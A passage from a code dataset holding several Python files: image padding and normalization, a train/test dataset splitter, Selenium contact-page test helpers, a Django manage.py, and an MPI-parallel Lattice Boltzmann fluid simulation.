cv2.copyMakeBorder(img2, padtop, padbottom, padleft, padright, cv2.BORDER_REPLICATE)\n elif border_mode == 'zero':\n padded = cv2.copyMakeBorder(img2, padtop, padbottom, padleft, padright, cv2.BORDER_CONSTANT, value=0)\n elif border_mode == 'reflect':\n padded = cv2.copyMakeBorder(img2, padtop, padbottom, padleft, padright, cv2.BORDER_REFLECT)\n elif border_mode == 'none':\n # No padding\n padded = img2\n else:\n raise RuntimeError('Unknown border mode %s' % border_mode)\n\n if return_mask:\n mask = np.ones(img2.shape, img.dtype)\n mask = cv2.copyMakeBorder(mask, padtop, padbottom, padleft, padright, cv2.BORDER_CONSTANT,\n value=0)\n return padded, mask\n\n return padded\n\n\ndef pad_or_crop(img, size, return_mask=False, border_mode='replicate'):\n \"\"\"\n Pad or crop the image to make it into specific size\n :param size: an integer\n \"\"\"\n # Crop the image\n h, w = img.shape[:2]\n\n org_shape = img.shape\n\n cropleft = (w - size) // 2\n croptop = (h - size) // 2\n\n if cropleft >= 0:\n img = img[:, cropleft: cropleft + size]\n if croptop >= 0:\n img = img[croptop: croptop + size, :]\n\n # Pad if necessary\n h, w = img.shape[:2]\n\n padleft = (size - w) // 2\n padright = size - w - padleft\n padtop = (size - h) // 2\n padbottom = size - h - padtop\n\n try:\n mask = np.ones(img.shape, img.dtype)\n\n if border_mode == 'replicate':\n img = cv2.copyMakeBorder(img, padtop, padbottom, padleft, padright, cv2.BORDER_REPLICATE)\n elif border_mode == 'zero':\n img = cv2.copyMakeBorder(img, padtop, padbottom, padleft, padright, cv2.BORDER_CONSTANT, value=0)\n elif border_mode == 'reflect':\n img = cv2.copyMakeBorder(img, padtop, padbottom, padleft, padright, cv2.BORDER_REFLECT)\n else:\n raise RuntimeError('Unknown border mode %s' % border_mode)\n\n mask = cv2.copyMakeBorder(mask, padtop, padbottom, padleft, padright, cv2.BORDER_CONSTANT,\n value=0)\n except:\n print(org_shape)\n print(img.shape)\n print(cropleft)\n print(size)\n raise\n\n if return_mask:\n return img, mask\n\n return img\n\n\ndef get_gaussian_filter(src_size, dst_size):\n downscale_factor = src_size // dst_size\n sigma = (downscale_factor - 1) / 2\n\n if downscale_factor % 2 == 0:\n kernel_size = downscale_factor + 1\n else:\n kernel_size = downscale_factor\n\n return cv2.getGaussianKernel(kernel_size, sigma)\n\n\nif __name__ == '__main__':\n import glob\n import os\n from collections import defaultdict\n\n gflags.DEFINE_string('src_dir', '', '')\n gflags.DEFINE_string('dst_dir', '', '')\n gflags.DEFINE_string('mask_dir', '', 'If specified, will output masks to this directory.')\n gflags.DEFINE_integer('size', 512, '')\n gflags.DEFINE_string('border_mode', 'zero', \"none: no border; \"\n \"replicate: replicate border pixels; \"\n \"zero: fill in zero values.\")\n gflags.DEFINE_boolean('smoothing', True,\n 'Smooth the image before downsampling. '\n 'Note that here we assume original images are larger than the normalized images!')\n\n FLAGS = gflags.FLAGS\n FLAGS(sys.argv)\n\n SRC_DIR = FLAGS.src_dir\n DST_DIR = FLAGS.dst_dir\n MASK_DIR = FLAGS.mask_dir\n SIZE = FLAGS.size\n\n files = []\n for root, dirnames, filenames in os.walk(SRC_DIR):\n for fn in filenames:\n if fn.lower().endswith(('.tif', '.jpg', '.png')):\n files.append(os.path.join(root, fn))\n files.sort()\n\n print('%d files' % len(files))\n\n counts = defaultdict(int)\n\n last_img_width = None\n\n for idx, fn in enumerate(files):\n img = cv2.imread(fn, cv2.IMREAD_GRAYSCALE)\n\n if img.dtype == np.uint16:\n imgf = img / 65535.0\n elif img.dtype == np.uint8:\n imgf = img / 255.0\n else:\n raise RuntimeError('Unsupported datatype %s' % img.dtype)\n\n if len(imgf.shape) == 3 and imgf.shape[2] == 2:\n imgf = imgf[:, :, 0] # Photoshop creates one extra channel that seems to be all ones.\n\n if FLAGS.smoothing:\n if last_img_width is None or last_img_width != imgf.shape[1]:\n # Image size changed. Re-create kernel.\n filter_kernel = get_gaussian_filter(imgf.shape[1], SIZE)\n last_img_width = imgf.shape[1]\n imgf = cv2.sepFilter2D(imgf, -1, filter_kernel, filter_kernel)\n\n imgf, mask = resize_and_crop(imgf, SIZE, return_mask=True, border_mode=FLAGS.border_mode)\n\n subfamily, tribe, genus, species, sample_idx = parse_dataset.parse_filename(fn)\n bio_key = (subfamily, tribe, genus, species)\n key = bio_key + (counts[bio_key],)\n counts[bio_key] += 1\n\n out_fn = '%s.%s.%s.%s.%d.tif' % key\n cv2.imwrite(os.path.join(DST_DIR, out_fn), (imgf * 255).astype(np.uint8))\n\n if FLAGS.mask_dir != '':\n cv2.imwrite(os.path.join(MASK_DIR, out_fn), (mask * 255).astype(np.uint8))\n\n print('[%d/%d] %s -> %s' % (idx + 1, len(files), fn, out_fn))\n\n # Uncomment to visualize the output\n # cv2.imshow('resized', imgf)\n # cv2.waitKey(1)\n","repo_name":"benjlloyd/Phytolith_2D_ML","sub_path":"OLD_CODE/experimental/new_dataset/preprocess/normalization.py","file_name":"normalization.py","file_ext":"py","file_size_in_byte":6025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"10945297805","text":"import os\nimport argparse\nimport json\nimport glob\nimport shutil\nfrom time import time\nimport collections\nimport math\nimport os\nimport random\nfrom distutils.dir_util import copy_tree\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-fp\", \"--fp\", help=\"Folder where is the data\")\nparser.add_argument(\"-dn\", \"--dn\", help=\"The name of the new folder where is going to be the data\")\n\nargs = parser.parse_args()\n\n\nclass dataStructuring:\n\n\tdef __init__(self,folder_path,destination_path):\n\t\t\t\n\t\t\tself.folder_path = folder_path\n\t\t\tself.destination_path = destination_path\n\n\n\tdef split_data_into_train_test(self, data_path, destination_path):\n\t\t\"\"\"\n\t\tSplits the content inside the given data path into train and test sets and creates two new directories with\n\t\tthe result.\n\t\t\"\"\"\n\t\tprint(\"Splitting data into train and test...\")\n\t\ttrain_set_path = os.path.join(destination_path, \"train_set\")\n\t\ttest_set_path = os.path.join(destination_path, \"test_set\")\n\t\tself.create_data_split_directory(destination_path=destination_path, train_set_path=train_set_path,\n\t\t\t\t\t\t\t\t\t\t test_set_path=test_set_path)\n\n\t\tlot_dirs_by_label_directory = self.get_lot_dirs_by_label_directory(data_path=data_path)\n\n\t\treturn lot_dirs_by_label_directory\n\n\n\tdef create_data_split_directory(self, destination_path, train_set_path, test_set_path):\n\t\t\"\"\"Creates the directories for the data split.\"\"\"\n\t\tif os.path.exists(destination_path):\n\t\t\tshutil.rmtree(destination_path)\n\t\tos.mkdir(destination_path)\n\t\tinitial_time = time()\n\t\t# Waits for some time before creating the directories inside the one that was just created.\n\t\twhile (time() - initial_time) < 1:\n\t\t\tNone\n\t\tos.mkdir(train_set_path)\n\t\tos.mkdir(test_set_path)\n\n\tdef get_lot_dirs_by_label_directory(self, data_path):\n\t\t\"\"\"\n\t\tChecks the label directories and returns a list for each one containing the paths to their respective lot\n\t\tdirectories.\n\t\t\"\"\"\n\t\tlot_dirs_by_label_directory = dict()\n\t\tfor root, dirs, files in os.walk(data_path):\n\t\t\t\n\t\t\t# Iterates over the first layer of directories.\n\t\t\tfor directory in dirs:\n\t\t\t\tdirectory_path = os.path.join(root, directory)\n\t\t\t\tlot_dirs = list()\n\t\t\t\t# Iterates over each element within the directory path.\n\t\t\t\tfor lot_directory in os.listdir(directory_path):\n\t\t\t\t\tlot_directory_path = os.path.join(directory_path, lot_directory)\n\t\t\t\t\t# Appends the current element to the list if it is a directory.\n\t\t\t\t\tlot_dirs.append(lot_directory_path) if os.path.isdir(lot_directory_path) else None\n\t\t\t\t# Creates an entry on the dictionary for every label directory.\n\t\t\t\tlot_dirs_by_label_directory[directory] = lot_dirs\n\t\t\t# Only the first layer of directories is required. It is not necessary to keep walking through the tree.\n\t\t\tbreak\n\t\t# Orders the dictionary by the label directory and returns it.\n\t\treturn collections.OrderedDict(sorted(lot_dirs_by_label_directory.items()))\n\n\n\tdef elements_numbers_for_type(self, data_path):\n\t\t\"\"\"\n\t\t\tGets the amount of each data type\n\t\t\"\"\"\n\t\tcont_rgb = 0\n\t\tcont_re = 0\n\t\tcont_rgn = 0\n\t\tcont_json = 0\n\n\t\tfor root, dirs, files in os.walk(data_path):\n\t\t\t# Iterates over all the files into de lot folder\n\t\t\tfor file in files:\n\n\t\t\t\t# Finds the type of the file and sum it to its count\n\t\t\t\tif file.find(\".json\") != -1:\n\t\t\t\t\tcont_json += 1\n\n\t\t\t\tif file.find(\"re.JPG\") != -1:\n\t\t\t\t\tcont_re += 1\n\n\t\t\t\tif file.find(\"rgn.JPG\") != -1:\n\t\t\t\t\tcont_rgn += 1\n\n\t\t\t\tif file.find(\"plant\") != -1:\n\t\t\t\t\tcont_rgb += 1\n\n\t\t\t\n\t\treturn cont_json, cont_rgb, cont_rgn, cont_re\n\n\n\tdef get_stop_criterion(self,list_conts):\n\t\t\"\"\"\n\t\t\tGets the stop criterion of the label and its index\n\t\t\"\"\"\n\t\tmin_value = min(list_conts)\n\t\tmin_index_value = list_conts.index(min(list_conts))\n\t\ttype_selection = \"\"\n\n\t\tif min_index_value == 0:\n\t\t\ttype_selection = \"json\"\n\t\t\n\t\tif min_index_value == 1:\n\t\t\ttype_selection = \"rgb\"\n\n\t\tif min_index_value == 2:\n\t\t\ttype_selection = \"rgn\"\n\n\t\tif min_index_value == 3:\n\t\t\ttype_selection = \"re\"\n\n\t\tstop_criterion = math.ceil(min_value * 0.25)\n\n\t\treturn(stop_criterion,type_selection)\n\n\n\tdef valid_for_test(self, lot_directory):\n\t\t\"\"\"\n\t\t\tGets the amount of each data type\n\t\t\"\"\"\n\t\tcont_rgb = 0\n\t\tcont_re = 0\n\t\tcont_rgn = 0\n\t\tcont_json = 0\n\n\t\tfor root, dirs, files in os.walk(lot_directory):\n\t\t\t# Iterates over all the files into de lot folder\n\t\t\tfor file in files:\n\n\t\t\t\t# Finds the type of the file and sum it to its count\n\t\t\t\tif file.find(\".json\") != -1:\n\t\t\t\t\tcont_json += 1\n\n\t\t\t\tif file.find(\"re.JPG\") != -1:\n\t\t\t\t\tcont_re += 1\n\n\t\t\t\tif file.find(\"rgn.JPG\") != -1:\n\t\t\t\t\tcont_rgn += 1\n\n\t\t\t\tif file.find(\"plant\") != -1:\n\t\t\t\t\tcont_rgb += 1\n\n\t\t# If It has all the type files return true\n\t\tif cont_json >= 1 and cont_rgb >= 1 and cont_rgn >= 1 and cont_re >= 1 :\n\t\t\treturn True\n\n\t\treturn False\n\n\tdef validate_stop_criterion(self, lot_directory, type_selection):\n\n\t\t\"\"\"\n\t\t\tGets the amount of each data type\n\t\t\"\"\"\n\t\tcont_rgb = 0\n\t\tcont_re = 0\n\t\tcont_rgn = 0\n\t\tcont_json = 0\n\n\t\tfor root, dirs, files in os.walk(lot_directory):\n\t\t\t# Iterates over all the files into de lot folder\n\t\t\tfor file in files:\n\n\t\t\t\t# Finds the type of the file and sum it to its count\n\t\t\t\tif file.find(\".json\") != -1:\n\t\t\t\t\tcont_json += 1\n\n\t\t\t\tif file.find(\"re.JPG\") != -1:\n\t\t\t\t\tcont_re += 1\n\n\t\t\t\tif file.find(\"rgn.JPG\") != -1:\n\t\t\t\t\tcont_rgn += 1\n\n\t\t\t\tif file.find(\"plant\") != -1:\n\t\t\t\t\tcont_rgb += 1\n\n\n\t\tif type_selection == \"json\":\n\t\t\treturn cont_json\n\t\t\n\t\tif type_selection == \"rgb\":\n\t\t\treturn cont_rgb\n\n\t\tif type_selection == \"rgn\":\n\t\t\treturn cont_rgn\n\n\t\tif type_selection == \"re\":\n\t\t\treturn cont_re\n\t\t\n\tdef copy_tree(self,list_set,list_set_path,label_directory):\n\n\t\t\"\"\"\n\t\t\tCopies the lot directory in destination directory\n\t\t\"\"\"\n\t\ttrain_lot_dirs_destination = os.path.join(list_set_path,label_directory)\n\t\tfor list_index in list_set:\n\t\t\tlot_directory_path_list = list_index.split('/')\n\t\t\t# Extracts the name of the lot directory.\n\t\t\tlot_directory_name = lot_directory_path_list[len(lot_directory_path_list) - 1]\n\t\t\tlot_directory_destination = os.path.join(train_lot_dirs_destination, lot_directory_name)\n\t\t\t# Copies the entire lot directory to the corresponding destination and preserves its content.\n\t\t\tshutil.copytree(list_index, lot_directory_destination)\n\t\t\t\n\n\tdef run(self):\n\n\t\t# Split the folder by '/'\n\t\tfolder_path_list = self.folder_path.split('/')\n\n\t\t# Removes the last element of the list\n\t\tfolder_path_list = folder_path_list[:len(folder_path_list)-2]\n\n\t\t# Create a new folder path without the last element, and concatenate the new name \n\t\tnew_folder_path = '/'.join(folder_path_list) + '/'+ args.dn\n\t\tself.destination_path = new_folder_path \n\t\t\n\t\tlot_dirs_g = self.split_data_into_train_test(self.folder_path,self.destination_path)\n\t\t\n\t\tfor label_directory, lot_dirs in lot_dirs_g.items():\n\t\t\t# shuffle the list for each label\n\t\t\trandom.shuffle(lot_dirs)\n\n\t\t\tcont_label_json = 0\n\t\t\tcont_label_rgb = 0\n\t\t\tcont_label_rgn = 0\n\t\t\tcont_label_re = 0\n\t\t\t\n\t\t\t# Iterates over the lot directories and count the amount of each type\n\t\t\tfor lot_directory in lot_dirs:\n\t\t\t\n\t\t\t\tcont_json, cont_rgb, cont_rgn, cont_re = self.elements_numbers_for_type(lot_directory)\n\t\t\t\tcont_label_json += cont_json\n\t\t\t\tcont_label_rgb += cont_rgb\n\t\t\t\tcont_label_rgn += cont_rgn\n\t\t\t\tcont_label_re += cont_re\n\n\t\t\tlist_conts = [cont_label_json, cont_label_rgb, cont_label_rgn, cont_label_re]\n\n\t\t\t# Gets the stop criterion and its type\n\t\t\tstop_criterion,type_selection = self.get_stop_criterion(list_conts)\n\t\t\n\t\t\ttrain_set = []\n\t\t\ttest_set = []\n\t\t\tcont = 0\n\t\t\t# Iterates over all the lot dirs\n\t\t\tfor lot_directory in lot_dirs:\n\n\t\t\t\t# Verifies if the dir is valid because has the 4 types\n\t\t\t\tif self.valid_for_test(lot_directory):\n\t\t\t\t\t# Verifies if don't pass the stop croterion\n\t\t\t\t\tif cont + self.validate_stop_criterion(lot_directory,type_selection) <= stop_criterion:\n\t\t\t\t\t\ttest_set.append(lot_directory)\n\t\t\t\t\t\t# Acumulates the cont with the value of the type selection\n\t\t\t\t\t\tcont += self.validate_stop_criterion(lot_directory,type_selection)\n\n\t\t\t\t\telse:\n\t\t\t\t\t\ttrain_set.append(lot_directory)\n\n\t\t\t\telse:\n\t\t\t\t\ttrain_set.append(lot_directory)\n\t\n\t\t\ttrain_set_path = os.path.join(self.destination_path, \"train_set\")\t\n\t\t\ttest_set_path = os.path.join(self.destination_path, \"test_set\")\n\n\t\t\t# Copies train and test lists into the folders\n\t\t\tself.copy_tree(train_set,train_set_path,label_directory)\n\t\t\tself.copy_tree(test_set,test_set_path,label_directory)\n\t\t\t\n\t\tprint(\"Splitting data successfully...\")\n\nds = dataStructuring(args.fp,args.dn)\nds.run()","repo_name":"ibalejandro/coffee_leaf_rust_diagnosis_dl","sub_path":"Model/dataSplitter.py","file_name":"dataSplitter.py","file_ext":"py","file_size_in_byte":8371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"15047475009","text":"from selenium.webdriver.common.by import By\nfrom model.contact import Contact\nimport re\n\n\nclass ContactHelper:\n\n def __init__(self, app):\n self.app = app\n\n def return_home_page(self):\n wd = self.app.wd\n wd.find_element(By.LINK_TEXT, \"home page\").click()\n\n def add(self, contact):\n wd = self.app.wd\n self.app.open_home_page()\n wd.find_element(By.LINK_TEXT, \"add new\").click()\n self.fill_contact_form(contact)\n wd.find_element(By.XPATH, \"//div[@id='content']/form/input[21]\").click()\n self.return_home_page()\n self.cont_cache = None\n\n def delete_first_cont(self):\n self.delete_some_cont(0)\n\n def delete_some_cont(self, index):\n wd = self.app.wd\n self.app.open_home_page()\n wd.find_elements(By.NAME, \"selected[]\")[index].click()\n wd.find_element(By.XPATH, \"//input[@value='Delete']\").click()\n wd.switch_to.alert.accept()\n self.cont_cache = None\n\n def delete_some_cont_by_id(self, id):\n wd = self.app.wd\n self.app.open_home_page()\n wd.find_element(By.CSS_SELECTOR, \"input[value='%s']\" % id).click()\n wd.find_element(By.XPATH, \"//input[@value='Delete']\").click()\n wd.switch_to.alert.accept()\n self.cont_cache = None\n\n def add_some_cont_to_group(self, id):\n wd = self.app.wd\n self.app.open_home_page()\n wd.find_element(By.CSS_SELECTOR, \"input[value='%s']\" % id).click()\n wd.find_element(By.XPATH, \"//input[@value='Add to']\").click()\n self.cont_cache = None\n\n def select_group_for_del_cont(self, index):\n wd = self.app.wd\n self.app.open_home_page()\n wd.find_element(By.NAME, \"group\").click()\n wd.find_element(By.XPATH, f\"//option[@value={index}]\").click()\n\n def del_some_cont_from_group(self, id):\n wd = self.app.wd\n wd.find_element(By.CSS_SELECTOR, \"input[value='%s']\" % id).click()\n wd.find_element(By.NAME, \"remove\").click()\n wd.find_element(By.XPATH, \"//i/a\").click()\n #wd.find_element(By.LINK_TEXT, f'a[href=\"/?group={id}\"]').click()\n self.cont_cache = None\n\n def edit_first_cont(self, contact):\n self.edit_some_cont(0)\n\n def edit_some_cont(self, index, contact):\n wd = self.app.wd\n self.app.open_home_page()\n wd.find_elements(By.XPATH, \"//img[@alt='Edit']\")[index].click()\n self.fill_contact_form(contact)\n wd.find_element(By.NAME, \"update\").click()\n self.return_home_page()\n self.cont_cache = None\n\n def edit_some_cont_by_id(self, id, contact):\n wd = self.app.wd\n self.app.open_home_page()\n #wd.find_element(By.CSS_SELECTOR, f\"a[href='edit.php?id={id}']\").click()\n wd.find_element(By.CSS_SELECTOR, \"a[href='edit.php?id=%s']\" % id).click()\n self.fill_contact_form(contact)\n wd.find_element(By.NAME, \"update\").click()\n self.return_home_page()\n self.cont_cache = None\n\n #def contact(self, contact):\n # wd = self.app.wd\n # wd.find_element(By.NAME, \"firstname\").click()\n # wd.find_element(By.NAME, \"firstname\").clear()\n # wd.find_element(By.NAME, \"firstname\").send_keys(contact.firstname)\n # wd.find_element(By.NAME, \"middlename\").clear()\n # wd.find_element(By.NAME, \"middlename\").send_keys(contact.middlename)\n # wd.find_element(By.NAME, \"lastname\").clear()\n # wd.find_element(By.NAME, \"lastname\").send_keys(contact.lastname)\n # wd.find_element(By.NAME, \"mobile\").click()\n # wd.find_element(By.NAME, \"mobile\").clear()\n # wd.find_element(By.NAME, \"mobile\").send_keys(contact.telephone)\n\n def fill_contact_form(self, contact):\n wd = self.app.wd\n self.change_contact_field(\"firstname\", contact.firstname)\n self.change_contact_field(\"middlename\", contact.middlename)\n self.change_contact_field(\"lastname\", contact.lastname)\n #self.change_contact_field(\"home\", contact.homephone)\n #self.change_contact_field(\"mobile\", contact.telephone)\n\n def change_contact_field(self, field_name, text):\n wd = self.app.wd\n if text is not None:\n wd.find_element(By.NAME, field_name).click()\n wd.find_element(By.NAME, field_name).clear()\n wd.find_element(By.NAME, field_name).send_keys(text)\n\n def count_cont(self):\n wd = self.app.wd\n self.app.open_home_page()\n return len(wd.find_elements(By.XPATH, \"//img[@alt='Edit']\"))\n\n cont_cache = None\n\n def get_contact_list(self):\n if self.cont_cache is None:\n wd = self.app.wd\n self.app.open_home_page()\n self.cont_cache = []\n for element in wd.find_elements(By.NAME, \"entry\"):\n cells = element.find_elements(By.TAG_NAME, \"td\")\n id = cells[0].find_element(By.NAME, \"selected[]\").get_attribute(\"value\")\n firstname = cells[2].text\n lastname = cells[1].text\n all_phones = cells[5].text\n adress = cells[3].text\n all_mails = cells[4].text\n self.cont_cache.append(Contact(firstname=firstname, lastname=lastname, id=id, adress=adress,\n all_phones_from_home_page=all_phones, all_mails=all_mails))\n return list(self.cont_cache)\n\n def open_contact_to_edit(self, index):\n wd = self.app.wd\n self.app.open_home_page()\n row = wd.find_elements(By.NAME, \"entry\")[index]\n cell = row.find_elements(By.TAG_NAME, \"td\")[7]\n cell.find_element(By.TAG_NAME, \"a\").click()\n\n def open_contact_view(self, index):\n wd = self.app.wd\n self.app.open_home_page()\n row = wd.find_elements(By.NAME, \"entry\")[index]\n cell = row.find_elements(By.TAG_NAME, \"td\")[6]\n cell.find_element(By.TAG_NAME, \"a\").click()\n\n def get_contact_info_from_edit_page(self, index):\n wd = self.app.wd\n self.open_contact_to_edit(index)\n firstname = wd.find_element(By.NAME, \"firstname\").get_attribute(\"value\")\n lastname = wd.find_element(By.NAME, \"lastname\").get_attribute(\"value\")\n adress = wd.find_element(By.NAME, \"address\").get_attribute(\"value\")\n email = wd.find_element(By.NAME, \"email\").get_attribute(\"value\")\n email2 = wd.find_element(By.NAME, \"email2\").get_attribute(\"value\")\n email3 = wd.find_element(By.NAME, \"email3\").get_attribute(\"value\")\n id = wd.find_element(By.NAME, \"id\").get_attribute(\"value\")\n homephone = wd.find_element(By.NAME, \"home\").get_attribute(\"value\")\n workphone = wd.find_element(By.NAME, \"work\").get_attribute(\"value\")\n mobilephone = wd.find_element(By.NAME, \"mobile\").get_attribute(\"value\")\n secondaryphone = wd.find_element(By.NAME, \"phone2\").get_attribute(\"value\")\n return Contact(firstname=firstname, lastname=lastname, id=id, adress=adress, homephone=homephone,\n workphone=workphone, mobilephone=mobilephone, secondaryphone=secondaryphone,\n email=email, email2=email2, email3=email3)\n\n def get_contact_from_view_page(self, index):\n wd = self.app.wd\n self.open_contact_view(index)\n text = wd.find_element(By.ID, \"content\").text\n homephone = re.search(\"H: (.*)\", text).group(1)\n workphone = re.search(\"W: (.*)\", text).group(1)\n mobilephone = re.search(\"M: (.*)\", text).group(1)\n secondaryphone = re.search(\"P: (.*)\", text).group(1)\n return Contact(homephone=homephone, workphone=workphone,\n mobilephone=mobilephone, secondaryphone=secondaryphone)","repo_name":"kabanovic/python_training","sub_path":"fixture/contact.py","file_name":"contact.py","file_ext":"py","file_size_in_byte":7672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"40131431806","text":"#!/usr/bin/env python\n\nimport os\nimport sys\n\nPROJECT_DIR = os.path.abspath(os.path.dirname(__file__))\nsys.path.append(PROJECT_DIR)\nsys.path.append(os.path.abspath(PROJECT_DIR + '/../'))\nsys.path.append(os.path.abspath(PROJECT_DIR + '/../realestate/'))\n\nif __name__ == \"__main__\":\n os.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"testproject.settings\")\n\n from django.core.management import execute_from_command_line\n\n execute_from_command_line(sys.argv)\n\n","repo_name":"wm3ndez/realestate","sub_path":"testproject/manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"91"} +{"seq_id":"6282225765","text":"\"\"\"\nStreaming and collision step\n============================\nThe streaming step is the first step of the Lattice Boltzmann Method (LBM).\nThe streaming step is a simple shift of the pdf in the direction of the\nvelocity. The collision step is the second step of the LBM. The collision step\nis a relaxation of the pdf towards the equilibrium pdf. The equilibrium pdf is\nthe pdf that would be obtained if the fluid particles were in equilibrium. The\nequilibrium pdf is calculated using the density and the velocity of the fluid\nparticles. \n============================\n\nto run the script: \nmpirun -np 4 python scripts/milestone2_parallel.py\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpi4py import MPI\nfrom array2gif import write_gif\n\nfrom hpc_fluid_dynamics.lbm_utils import *\n\n\ncomm = MPI.COMM_WORLD # start the communicator assign to comm\nsize = comm.Get_size() # get the size and assign to size\nrank = comm.Get_rank()\n\n\nnt = 1000 # timesteps to iterate\ndt = 0.0001 # timestep length\n\nomega = 1\nprint('Rank/Size {}/{}'.format(rank,size))\n\nNX = 256\nNY = 256\n\n### Domain decomposition\nif NX < NY:\n sectsX=int(np.floor(np.sqrt(size*NX/NY)))\n sectsY=int(np.floor(size/sectsX))\n print('We have {} fields in x-direction and {} in y-direction'.format(sectsX,sectsY))\n print('How do the fractions look like?')\n print('NX/NY={} and sectsX/sectsY = {}\\n'.format(NX/NY,sectsX/sectsY))\nelif NX > NY:\n sectsY=int(np.floor(np.sqrt(size*NY/NX)))\n sectsX=int(np.floor(size/sectsY))\n print('We have {} fields in x-direction and {} in y-direction'.format(sectsX,sectsY))\n print('How do the fractions look like?')\n print('NX/NY={} and sectsX/sectsY = {}\\n'.format(NX/NY,sectsX/sectsY))\nelif NX==NY:\n sectsY=int(np.floor(np.sqrt(size)))\n sectsX=int(size/sectsY)\n if rank == 0: print('In the case of equal size we divide the processes as {} and {}'.format(sectsX,sectsY))\n\nsectsX=int(np.floor(np.sqrt(size)))\nsectsY=int(size//sectsX)\n\nnxsub = NX//sectsX+2\nnysub = NY//sectsY+2\nboundary_k=[False,False,False,False]\ncartcomm=comm.Create_cart(dims=[sectsX,sectsY],periods=[True,True],reorder=False)\nrcoords = cartcomm.Get_coords(rank)\n\n# where to receive from and where send to \nsR,dR = cartcomm.Shift(1,1)\nsL,dL = cartcomm.Shift(1,-1)\n\nsU,dU = cartcomm.Shift(0,-1)\nsD,dD = cartcomm.Shift(0,1)\n\nsd = np.array([sR,dR,sL,dL,sU,dU,sD,dD], dtype = int)\n\nallrcoords = comm.gather(rcoords,root = 0)\nallDestSourBuf = np.zeros(size*8, dtype = int)\ncomm.Gather(sd, allDestSourBuf, root = 0)\n\nif rank == 0: \n density_plot_list = []\n print(allrcoords)\n print(' ')\n cartarray = np.ones((sectsY,sectsX),dtype=int)\n allDestSour = np.array(allDestSourBuf).reshape((size,8))\n for i in np.arange(size):\n cartarray[allrcoords[i][0],allrcoords[i][1]] = i\n print('Rank {} all destinations and sources {}'.format(i,allDestSour[i,:]))\n sR,dR,sL,dL,sU,dU,sD,dD = allDestSour[i]\n print('Rank {} is at {}'.format(i,allrcoords[i]))\n print('sour/dest right {} {}'.format(sR,dR))\n print('sour/dest left {} {}'.format(sL,dL)) \n print('sour/dest up {} {}'.format(sU,dU))\n print('sour/dest down {} {}'.format(sD,dD))\n #print('[stdout:',i,']',allDestSour[i])\n print('')\n print(cartarray)\n\ndef Communicate(pdf_9xy,cartcomm,sd):\n recvbuf = np.zeros(pdf_9xy[:,:,1].shape)\n sR,dR,sL,dL,sU,dU,sD,dD = sd\n # Send to right which is destination rigth (dR) and receive from left which is source right (sR)\n # print(rank,'Right, source',sR,'destination',dR)\n sendbuf = pdf_9xy[:,:,-2].copy() # Send the second last column to dR\n cartcomm.Sendrecv(sendbuf, dR, recvbuf = recvbuf, source = sR)\n pdf_9xy[:,:,0] = recvbuf # received into the 0th column from sR\n # Send to left and receive from right\n #print(rank,'Left, source',sL,'destination',dL)\n sendbuf = pdf_9xy[:,:,1].copy()\n cartcomm.Sendrecv(sendbuf, dL, recvbuf = recvbuf, source = sL)\n pdf_9xy[:,:,-1] = recvbuf\n # Send to up and receive from down\n #print(rank,'Up, source',sU,'destination',dU)\n sendbuf = pdf_9xy[:,1,:].copy()\n cartcomm.Sendrecv(sendbuf, dU, recvbuf = recvbuf, source = sU)\n pdf_9xy[:,-1,:] = recvbuf\n # Send to down and receive from up\n #print(rank,'Down, source',sD,'destination',dD)\n sendbuf = pdf_9xy[:,-2,:].copy()\n cartcomm.Sendrecv(sendbuf, dD, recvbuf = recvbuf, source = sD)\n pdf_9xy[:,0,:]=recvbuf\n#\n return pdf_9xy\n\n## INTIALIZE THE GRID\n\npdf_9xy_full_range = init_pdf(NX,NY,mode = \"square\")\npdf_9xy = pdf_9xy_full_range[:,rcoords[0]*NY//sectsY:(rcoords[0]+1)*NY//sectsY,rcoords[1]*NX//sectsX:(rcoords[1]+1)*NX//sectsX]\n\nfor t in np.arange(nt):\n # First we need a communication step\n pdf_9xy = Communicate(pdf_9xy,cartcomm,sd)\n # Then we do a timestep forward\n # MOMENT UPDATE \n density = calc_density(pdf_9xy)\n local_avg_velocity = calc_local_avg_velocity(pdf_9xy)\n\n # EQULIBRIUM \n equilibrium_pdf_9xy = calc_equilibrium_pdf(density, local_avg_velocity)\n\n # COLLISION STEP\n pdf_9xy = pdf_9xy + omega*(equilibrium_pdf_9xy - pdf_9xy)\n\n # STREAMING STEP\n pdf_9xy = streaming(pdf_9xy)\n density_full_range = np.zeros((NX*NY))\n\n #comm.Gather(density[1:-1,1:-1].reshape((nxsub-2)*(nysub-2)), density_full_range, root = 0)\n comm.Gather(density.reshape((nxsub-2)*(nysub-2)), density_full_range, root = 0)\n rcoords_x = comm.gather(rcoords[1], root=0)\n rcoords_y = comm.gather(rcoords[0], root=0)\n if rank == 0:\n\n X0, Y0 = np.meshgrid(np.arange(NX),np.arange(NY))\n xy = np.array([rcoords_x,rcoords_y]).T\n density_plot = np.zeros((NX,NY))\n #\n for i in np.arange(sectsX):\n for j in np.arange(sectsY):\n k = i*sectsX+j\n xlo = NX//sectsX*xy[k,1]\n xhi = NX//sectsX*(xy[k,1]+1)\n ylo = NY//sectsY*xy[k,0]\n yhi = NY//sectsY*(xy[k,0]+1)\n clo = k*NX*NY//(sectsX*sectsY)\n chi = (k+1)*NX*NY//(sectsX*sectsY)\n\n density_plot[xlo:xhi,ylo:yhi] = density_full_range[clo:chi].reshape(NX//sectsX,NY//sectsY)\n #print the middle of the grid\n print(density_plot[NX//2,NY//2])\n density_plot_list.append(density_plot)\n\nif rank == 0:\n \n c_plot_list = np.array(density_plot_list)\n print(c_plot_list.shape)\n c_plot_list = c_plot_list[..., np.newaxis] * np.ones(3)\n c_plot_list = c_plot_list / np.max(c_plot_list) * 255\n write_gif(c_plot_list, 'results/ml2_parallel_cluster.gif', 